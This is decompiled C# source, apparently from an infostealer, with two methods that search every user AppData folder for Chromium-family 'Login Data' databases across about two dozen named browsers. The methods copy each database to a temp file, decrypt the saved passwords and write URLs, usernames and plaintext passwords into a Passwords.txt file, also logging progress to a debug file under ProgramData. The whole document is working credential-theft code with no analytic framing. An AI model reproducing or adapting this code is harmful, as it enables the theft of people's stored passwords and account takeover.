// Token: 0x060000EC RID: 236 RVA: 0x00006FC0 File Offset: 0x000051C0 private static void AhtOfHyXu6() { StreamWriter streamWriter = new StreamWriter("C:\\ProgramData\\debug.txt", true); try { Directory.CreateDirectory(Program.path + "\\Browsers"); List <LogPassData> list = new List <LogPassData>(); List <string> list2 = new List <string>(); List <string> list3 = new List <string> { Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) }; List <string> list4 = new List <string>(); foreach (string path in list3) { try { list4.AddRange(Directory.EnumerateDirectories(path)); } catch { } } foreach (string path2 in list4) { try { list2.AddRange(Directory.EnumerateFiles(path2, "Login *", SearchOption.AllDirectories)); list2.AddRange(Directory.GetFiles(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Login Data", SearchOption.AllDirectories)); list2.AddRange(Directory.GetFiles(path2, "Login Data", SearchOption.AllDirectories)); string[] files = Directory.GetFiles(path2, "Login Data", SearchOption.AllDirectories); foreach (string text in files) { streamWriter.WriteLine("+" + text); streamWriter.WriteLine("[Browsers] " + text); try { if (File.Exists(text)) { string text2 = "Unknown (" + text + ")"; if (text.Contains("Chrome")) { text2 = "Google Chrome"; } if (text.Contains("Yandex")) { text2 = "Yandex Browser"; } if (text.Contains("Orbitum")) { text2 = "Orbitum Browser"; } if (text.Contains("Opera")) { text2 = "Opera Browser"; } if (text.Contains("Amigo")) { text2 = "Amigo Browser"; } if (text.Contains("Torch")) { text2 = "Torch Browser"; } if (text.Contains("Comodo")) { text2 = "Comodo Browser"; } if (text.Contains("CentBrowser")) { text2 = "CentBrowser"; } if (text.Contains("Go!")) { text2 = "Go!"; } if (text.Contains("uCozMedia")) { text2 = "uCozMedia"; } if (text.Contains("Rockmelt")) { text2 = "Rockmelt"; } if (text.Contains("Sleipnir")) { text2 = "Sleipnir"; } if (text.Contains("SRWare Iron")) { text2 = "SRWare Iron"; } if (text.Contains("Vivaldi")) { text2 = "Vivaldi"; } if (text.Contains("Sputnik")) { text2 = "Sputnik"; } if (text.Contains("Maxthon")) { text2 = "Maxthon"; } if (text.Contains("AcWebBrowser")) { text2 = "AcWebBrowser"; } if (text.Contains("Epic Browser")) { text2 = "Epic Browser"; } if (text.Contains("MapleStudio")) { text2 = "MapleStudio"; } if (text.Contains("BlackHawk")) { text2 = "BlackHawk"; } if (text.Contains("Flock")) { text2 = "Flock"; } if (text.Contains("CoolNovo")) { text2 = "CoolNovo"; } if (text.Contains("Baidu Spark")) { text2 = "Baidu Spark"; } if (text.Contains("Titan Browser")) { text2 = "Titan Browser"; } try { streamWriter.WriteLine("[Browsers] Try get " + text2 + " / " + text); string text3 = Path.GetTempPath() + "/" + Class6.smethod_2() + ".fv"; if (File.Exists(text3)) { File.Delete(text3); } File.Copy(text, text3, true); Class7 @class = new Class7(text3); if ([email protected]_4("logins")) { break; } int num = 0; for (;;) { try { if (num >= @class.method_1()) { break; } try { string text4 = string.Empty; try { text4 = Encoding.UTF8.GetString(Class2.smethod_1(Encoding.Default.GetBytes(@class.method_0(num, 5)), null)); } catch (Exception) { } if (text4 != "") { LogPassData item = new LogPassData { Url = @class.method_0(num, 1).Replace("https://", "").Replace("http://", ""), Login = @class.method_0(num, 3), Password = text4, Program = text2 }; list.Add(item); streamWriter.WriteLine("[Browsers] Added to passwords / " + text2); } } catch (Exception) { } num++; } catch { } } File.Delete(text3); } catch { } } } catch (Exception ex) { streamWriter.WriteLine("ERROR / " + text + " / - " + ex.ToString()); } } } catch { } } Environment.GetEnvironmentVariable("LocalAppData"); string text5 = ""; streamWriter.WriteLine("[Browsers] Domain detect"); foreach (LogPassData logPassData in list) { text5 += logPassData.ToString(); try { string text6 = logPassData.Url.Contains("/") ? logPassData.Url.Split(new char[] { '/' })[0] : logPassData.Url; if (!Class10.string_10.Contains(text6)) { Class10.string_10 = Class10.string_10 + text6 + ";"; } } catch (Exception value) { Console.Write(value); } } File.WriteAllText(Program.path + "\\Browsers\\Passwords.txt", (text5 != null) ? (text5 + "\n――――――――――――――――――――――――――――――――――――――――――――") : ""); streamWriter.WriteLine("[Browsers] Writed to file..."); Class10.string_0 = list.Count.ToString(); streamWriter.WriteLine("[Browsers] Counters (exit)"); } catch (Exception ex2) { streamWriter.WriteLine(ex2.ToString()); } streamWriter.Close(); }
private static void smethod_5() { Directory.CreateDirectory(Program.path + "\\Browsers\\Cookies"); List <LogPassData> logPassDataList = new List <LogPassData>(); List <string> stringList1 = new List <string>(); List <string> stringList2 = new List <string>(); stringList2.Add(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)); stringList2.Add(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData)); List <string> stringList3 = new List <string>(); foreach (string path in stringList2) { try { stringList3.AddRange(Directory.EnumerateDirectories(path)); } catch { } } using (List <string> .Enumerator enumerator = stringList3.GetEnumerator()) { label_81: while (enumerator.MoveNext()) { string current = enumerator.Current; try { string[] files = Directory.GetFiles(current, "Login Data", SearchOption.AllDirectories); int index = 0; while (true) { if (index < files.Length) { string str1 = files[index]; try { if (File.Exists(str1)) { string str2 = "Unknown (" + str1 + ")"; if (str1.Contains("Chrome")) { str2 = "Google Chrome"; } if (str1.Contains("Yandex")) { str2 = "Yandex Browser"; } if (str1.Contains("Orbitum")) { str2 = "Orbitum Browser"; } if (str1.Contains("Opera")) { str2 = "Opera Browser"; } if (str1.Contains("Amigo")) { str2 = "Amigo Browser"; } if (str1.Contains("Torch")) { str2 = "Torch Browser"; } if (str1.Contains("Comodo")) { str2 = "Comodo Browser"; } if (str1.Contains("CentBrowser")) { str2 = "CentBrowser"; } if (str1.Contains("Go!")) { str2 = "Go!"; } if (str1.Contains("uCozMedia")) { str2 = "uCozMedia"; } if (str1.Contains("Rockmelt")) { str2 = "Rockmelt"; } if (str1.Contains("Sleipnir")) { str2 = "Sleipnir"; } if (str1.Contains("SRWare Iron")) { str2 = "SRWare Iron"; } if (str1.Contains("Vivaldi")) { str2 = "Vivaldi"; } if (str1.Contains("Sputnik")) { str2 = "Sputnik"; } if (str1.Contains("Maxthon")) { str2 = "Maxthon"; } if (str1.Contains("AcWebBrowser")) { str2 = "AcWebBrowser"; } if (str1.Contains("Epic Browser")) { str2 = "Epic Browser"; } if (str1.Contains("MapleStudio")) { str2 = "MapleStudio"; } if (str1.Contains("BlackHawk")) { str2 = "BlackHawk"; } if (str1.Contains("Flock")) { str2 = "Flock"; } if (str1.Contains("CoolNovo")) { str2 = "CoolNovo"; } if (str1.Contains("Baidu Spark")) { str2 = "Baidu Spark"; } if (str1.Contains("Titan Browser")) { str2 = "Titan Browser"; } try { string str3 = Path.GetTempPath() + "/" + Class4.smethod_2() + ".fv"; if (File.Exists(str3)) { File.Delete(str3); } File.Copy(str1, str3, true); Class5 class5 = new Class5(str3); if (class5.method_6("logins")) { int int_0 = 0; while (true) { try { for (; int_0 < class5.method_2(); ++int_0) { try { string empty = string.Empty; try { empty = Encoding.UTF8.GetString(Class1.smethod_1(Encoding.Default.GetBytes(class5.method_3(int_0, 5)), (byte[])null)); } catch (Exception ex) { } if (empty != "") { LogPassData logPassData = new LogPassData() { Url = class5.method_3(int_0, 1).Replace("https://", "").Replace("http://", ""), Login = class5.method_3(int_0, 3), Password = empty, Program = str2 }; logPassDataList.Add(logPassData); } } catch (Exception ex) { } } break; } catch { } } File.Delete(str3); } else { goto label_81; } } catch { } } } catch (Exception ex) { } ++index; } else { goto label_81; } } } catch { } } } Environment.GetEnvironmentVariable("LocalAppData"); string[] array = stringList1.ToArray(); for (int index = 0; index < array.Length; ++index) { if (File.Exists(array[index])) { string str1 = "Unknown (" + array[index] + ")"; if (array[index].Contains("Chrome")) { str1 = "Google Chrome"; } if (array[index].Contains("Yandex")) { str1 = "Yandex Browser"; } if (array[index].Contains("Orbitum")) { str1 = "Orbitum Browser"; } if (array[index].Contains("Opera")) { str1 = "Opera Browser"; } if (array[index].Contains("Amigo")) { str1 = "Amigo Browser"; } if (array[index].Contains("Torch")) { str1 = "Torch Browser"; } if (array[index].Contains("Comodo")) { str1 = "Comodo Browser"; } if (array[index].Contains("CentBrowser")) { str1 = "CentBrowser"; } if (array[index].Contains("Go!")) { str1 = "Go!"; } if (array[index].Contains("uCozMedia")) { str1 = "uCozMedia"; } if (array[index].Contains("Rockmelt")) { str1 = "Rockmelt"; } if (array[index].Contains("Sleipnir")) { str1 = "Sleipnir"; } if (array[index].Contains("SRWare Iron")) { str1 = "SRWare Iron"; } if (array[index].Contains("Vivaldi")) { str1 = "Vivaldi"; } if (array[index].Contains("Sputnik")) { str1 = "Sputnik"; } if (array[index].Contains("Maxthon")) { str1 = "Maxthon"; } if (array[index].Contains("AcWebBrowser")) { str1 = "AcWebBrowser"; } if (array[index].Contains("Epic Browser")) { str1 = "Epic Browser"; } if (array[index].Contains("MapleStudio")) { str1 = "MapleStudio"; } if (array[index].Contains("BlackHawk")) { str1 = "BlackHawk"; } if (array[index].Contains("Flock")) { str1 = "Flock"; } if (array[index].Contains("CoolNovo")) { str1 = "CoolNovo"; } if (array[index].Contains("Baidu Spark")) { str1 = "Baidu Spark"; } if (array[index].Contains("Titan Browser")) { str1 = "Titan Browser"; } try { string str2 = Path.GetTempPath() + "/" + Class4.smethod_2() + ".fv"; if (File.Exists(str2)) { File.Delete(str2); } File.Copy(array[index], str2, true); Class5 class5 = new Class5(str2); if (class5.method_6("logins")) { int int_0 = 0; while (true) { try { for (; int_0 < class5.method_2(); ++int_0) { try { string empty = string.Empty; try { empty = Encoding.UTF8.GetString(Class1.smethod_1(Encoding.Default.GetBytes(class5.method_3(int_0, 5)), (byte[])null)); } catch (Exception ex) { } if (empty != "") { LogPassData logPassData = new LogPassData() { Url = class5.method_3(int_0, 1).Replace("https://", "").Replace("http://", ""), Login = class5.method_3(int_0, 3), Password = empty, Program = str1 }; logPassDataList.Add(logPassData); } } catch (Exception ex) { } } break; } catch { } } File.Delete(str2); } else { break; } } catch { } } } string str4 = ""; foreach (LogPassData logPassData in logPassDataList) { str4 += logPassData.ToString(); try { string url; if (!logPassData.Url.Contains("/")) { url = logPassData.Url; } else { url = logPassData.Url.Split('/')[0]; } string str1 = url; if (!Class7.string_10.Contains(str1)) { if (Program.domaindetect.Contains(str1)) { Class7.string_10 = Class7.string_10 + str1 + ";"; } } } catch (Exception ex) { Console.Write((object)ex); } } File.WriteAllText(Program.path + "\\Browsers\\Passwords.txt", str4 != null ? str4 + "\n――――――――――――――――――――――――――――――――――――――――――――" : ""); Class7.string_0 = logPassDataList.Count.ToString(); }